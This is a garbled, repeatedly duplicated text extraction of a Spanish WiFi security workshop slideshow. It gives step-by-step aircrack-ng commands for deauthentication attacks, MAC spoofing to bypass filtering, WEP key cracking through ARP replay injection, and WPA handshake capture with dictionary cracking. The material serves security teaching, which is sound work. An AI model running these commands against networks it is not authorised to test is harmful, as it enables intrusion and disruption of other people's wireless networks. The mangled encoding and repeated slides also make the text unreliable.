httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 53: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 54: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 55: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

